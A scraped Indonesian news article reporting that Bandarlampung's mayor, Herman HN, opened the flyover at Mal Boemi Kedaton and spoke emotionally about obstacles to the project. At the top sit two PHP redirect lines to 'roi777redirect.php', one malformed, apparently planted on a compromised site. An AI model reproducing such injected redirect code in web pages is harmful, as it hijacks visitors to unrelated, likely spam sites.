header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Sempat Menangis, Herman HN: Ini Tantangan Terberat -
Sempat Menangis, Herman HN: Ini Tantangan Terberat

Flyover MBK Diresmikan

TRANSLAMPUNG.COM, BANDARLAMPUNG – Setelah sempat terhalang, akhirnya pembangunan jembatan layang (flyover) ruas Jalan Teuku Umar- ZA Pagaralam, depan Mal Boemi Kedaton (MBK) selesai.

Peresmian penggunaannya dilakukan oleh Wali Kota Bandarlampung Herman HN, usai menggelar istighosah bersama masyarakat Kota Bandarlampung dan Provinsi Lampung, Minggu (31/12) malam.

Dibangunnya jembatan layang ruas Jalan Teuku Umar- ZA Pagaralam, depan Mal Boemi Kedaton (MBK) diklaim dapat mengurai kemacetan di kedua ruas jalan tersebut hingga 70 persen.

Hal ini disampaikan Wali Kota Bandarlampung Herman HN, usai meresmikan flyover tersebut, Minggu (31/12) malam.

“Ini sangat membantu kelancaran masyarakat Kota Bandarlampung dan Provinsi Lampung. Pada 2019 akan ada dua (flyover) di Jalan Untung Surapati dan Jalan Badarudin,” ujar dia.

Masih kata Herman HN, dua flyover di ruas Jalan Pramuka dan Teuku Cik Ditiro akan selesai pada 25 Januari mendatang.

“(Penyelesaian) Itu (dua flyover) tanggal 25 Januari 2018. Seluruh kabupaten kota akan kita bangun. Ini ada delapan fly over, nanti dua yang (selesai) 25 Januari 2018,” tuturnya.

Menurut Herman HN, pengerjaan flyover MBK adalah yang terberat.

“Bagi saya tantangan yang berat, tadi saya terdiam dan menangis, karena keterlaluan. Jangan menghalang-halangi, nanti rakyat marah bagaimana. Ini untuk kepentingan rakyat,” tegasnya.

Herman HN meminta agar pembangunan yang dilakukannya jangan dikaitkan dengan politik.

“Pembangunan-pembangunan itu jangan dikait-kaitkan dengan politik. Ini pembangunan untuk rakyat. Semoga yang menghalang-halangi dapat hidayah. Ini bagian dari ikon Provinsi Lampung,” ujar wali kota dua periode itu. (jef/rus)

News Reporter